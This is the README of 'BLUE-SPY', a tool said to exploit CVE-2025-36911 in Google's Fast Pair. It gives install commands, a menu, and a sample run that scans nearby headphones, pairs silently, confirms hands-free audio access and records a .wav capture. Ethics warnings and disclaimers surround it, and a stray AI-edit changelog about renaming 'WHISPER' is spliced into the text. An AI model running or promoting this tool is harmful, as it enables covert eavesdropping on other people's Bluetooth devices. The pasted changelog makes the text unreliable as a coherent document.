
BLUE-SPY (Bluetooth Low Energy Universal Exploit - Security Penetration Testing) is a professional security assessment tool for analyzing CVE-2025-36911 vulnerabilities in Google's Fast Pair protocol implementation.
⚠️ DIESE SOFTWARE IST AUSSCHLIESSLICH FÜR AUTORISIERTE SICHERHEITSFORSCHUNG UND ETHISCHE TESTS BESTIMMT ⚠️
Die unbefugte Nutzung dieses Tools gegen Geräte, die Sie nicht besitzen oder für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben, ist ILLEGAL und kann zu Folgendem führen:
Durch die Nutzung dieses Tools erkennen Sie an und übernehmen die VOLLE Verantwortung für Ihre Handlungen.
BLUE-SPY (Bluetooth Low Energy Universal Exploit - Security Penetration Testing) ist ein professionelles Sicherheitsbewertungstool zur Analyse von CVE-2025-36911-Schwachstellen in Googles Fast Pair-Protokollimplementierung. Das Tool bietet:
bash
git clone https://github.com/Athexhacker/BLUE-SPY.git
cd BLUE-SPY
sudo apt-get update
sudo apt-get install -y \
python3-pip \
bluetooth \
bluez \
bluez-tools \
libbluetooth-dev \
libglib2.0-dev \
pulseaudio \
pulseaudio-module-bluetooth \
sox \
pavucontrol
sudo apt-get install -y python3-dev bash
pip3 install bleak dbus-python cryptography --break-system-packages
python3 -m venv BLUE-SPY-env source BLUE-SPY-env/bin/activate pip install bleak dbus-python cryptography
pip install pyaudio wave
bash
hciconfig -a
sudo systemctl stop bluetooth
sudo systemctl enable bluetooth sudo systemctl start bluetooth
sudo systemctl status bluetooth
sudo hciconfig hci0 piscan
sudo hciconfig hci0 reset
bash
bluetoothctl list
python3 -c "from bleak import BleakScanner; print('Bleak OK')"
sudo python3 BLUE-SPY.py
bash
git clone https://github.com/Athexhacker/BLUE-SPY.git cd BLUE-SPY
sudo apt-get install -y bluetooth bluez python3-pip pip3 install bleak cryptography
sudo python3 BLUE-SPY.py
Type: I ACCEPT RESPONSIBILITY
Select option: 1 (Quick Scan)
bash
sudo python3 BLUE-SPY.py
HAUPTMENÜ: [1] Schneller Gerätescan (10 Sekunden) [2] Kontinuierlicher Netzwerkscan (60+ Sekunden) [3] Bestimmtes Gerät anvisieren [4] Erweiterte Ausnutzung [5] Vorherige Ergebnisse anzeigen [0] Beenden
Ausgabe: Listet alle Fast Pair-Geräte mit Schwachstellenbewertungen (KRITISCH/HOCH/MITTEL/NIEDRIG)
bash
sudo python3 BLUE-SPY.py
Type: I ACCEPT RESPONSIBILITY
Select option: 1 Select scan type: 1 (10-second scan)
Found 3 Fast Pair device(s):
[CRITICAL] Sony WH-1000XM4 Address: 11:22:33:44:55:66 Model: abcd1234, RSSI: -45dBm Status: CRITICAL - Highly Vulnerable
[MEDIUM] Galaxy Buds Pro Address: AA:BB:CC:DD:EE:FF Model: efgh5678, RSSI: -62dBm Status: MEDIUM - Potentially Vulnerable
Select option: 5 Choose device number: 1 Type 'EXPLOIT' to proceed: EXPLOIT
Exploit result: PAIRING SUCCESSFUL [SUCCESS] Device may be compromised.
Test HFP connection? (y/n): y [CRITICAL] HFP AUDIO ACCESS CONFIRMED!
Attempt audio capture? (y/n): y [SUCCESS] Audio captured successfully! File: blue_spy_results/audio/capture_112233445566_20250120_093022.wav
BLUE-SPY speichert alle Ergebnisse automatisch in organisierten Verzeichnissen:
blue_spy_results/
├── scans/
│ ├── scan_20250120_093022.json
│ ├── all_devices_20250120_093022.json
│ └── target_112233445566_20250120_094155.json
├── exploits/
│ ├── exploit_112233445566_20250120_094155.json
│ └── batch_20250120_095233.json
└── audio/
└── capture_112233445566_20250120_094230.wav
json { "timestamp": "2026-01-20T09:30:22.123456", "device_count": 3, "devices": [ { "address": "11:22:33:44:55:66", "name": "Sony WH-1000XM4", "rssi": -45, "model_id": "abcd1234", "flags": 0, "tx_power": 4, "vulnerability_status": "CRITICAL - Highly Vulnerable", "vulnerability_score": 75, "vulnerability_reasons": [ "Silent pairing possible", "No passkey required" ] } ] }
bash
hciconfig -a sudo hciconfig hci0 reset
sudo python3 BLUE-SPY.py
sudo hciconfig hci0 piscan bluetoothctl scan on
sudo systemctl restart bluetooth sudo hciconfig hci0 reset
bash
pip3 install --upgrade bleak
pip3 install --upgrade cryptography
sudo apt-get install python3-dbus
bash
bluetoothctl
list # Verfügbare Adapter anzeigen show # Adapterdetails anzeigen scan on # Scannen starten
scan off # Scannen beenden devices # Entdeckte Geräte auflisten exit
RICHTLINIEN ZUM ETHISCHEN GEBRAUCH
Testen Sie nur Geräte, die Sie persönlich besitzen
Holen Sie eine ausdrückliche schriftliche Genehmigung für Geräte Dritter ein
Verwenden Sie das Tool in kontrollierten, isolierten Umgebungen
Dokumentieren Sie alle Testaktivitäten
Melden Sie Schwachstellen verantwortungsvoll
Halten Sie alle geltenden Gesetze ein
Testen Sie keine Geräte an öffentlichen Orten
Nehmen Sie kein Audio ohne ausdrückliche Zustimmung auf
Teilen oder veröffentlichen Sie keine erfassten Daten
Verwenden Sie das Tool nicht zur Überwachung oder zum Abhören
Versuchen Sie nicht, rechtliche Kontrollen zu umgehen
Verteilen Sie Exploit-Code nicht unverantwortlich
Wenn Sie mit diesem Tool Schwachstellen entdecken:
Diese Software wird nur zu Bildungszwecken und für autorisierte Sicherheitstests bereitgestellt. Die Autoren und Mitwirkenden:
Durch die Nutzung dieser Software erklären Sie sich damit einverstanden:
Key changes made:
1. **Renamed all instances** of "WHISPER" to "BLUE-SPY" throughout the document
2. **Updated the banner** to show BLUE-SPY instead of WHISPER
3. **Changed repository URLs** from `whisper.git` to `blue-spy.git`
4. **Updated directory names** from `whisper_results` to `blue_spy_results`
5. **Modified the tool name** in all command examples
6. **Updated the banner ASCII art** to reflect BLUE-SPY
7. **Changed all references** in headers, footers, and descriptions
8. **Added more prominent legal warnings** with emojis for emphasis
9. **Updated the screenshot placeholders** to generic descriptions (since actual screenshots would need to be updated)
| Bewertung | Punktzahl | Beschreibung |
|---|
| KRITISCH | 60-100 | Hoch verwundbar – Stille Kopplung möglich |
| HOCH | 40-59 | Wahrscheinlich verwundbar – Fehlende Sicherheitsflags |
| MITTEL | 20-39 | Potenziell verwundbar – Erfordert Untersuchung |
| NIEDRIG | 0-19 | Möglicherweise gepatcht – Erscheint sicher |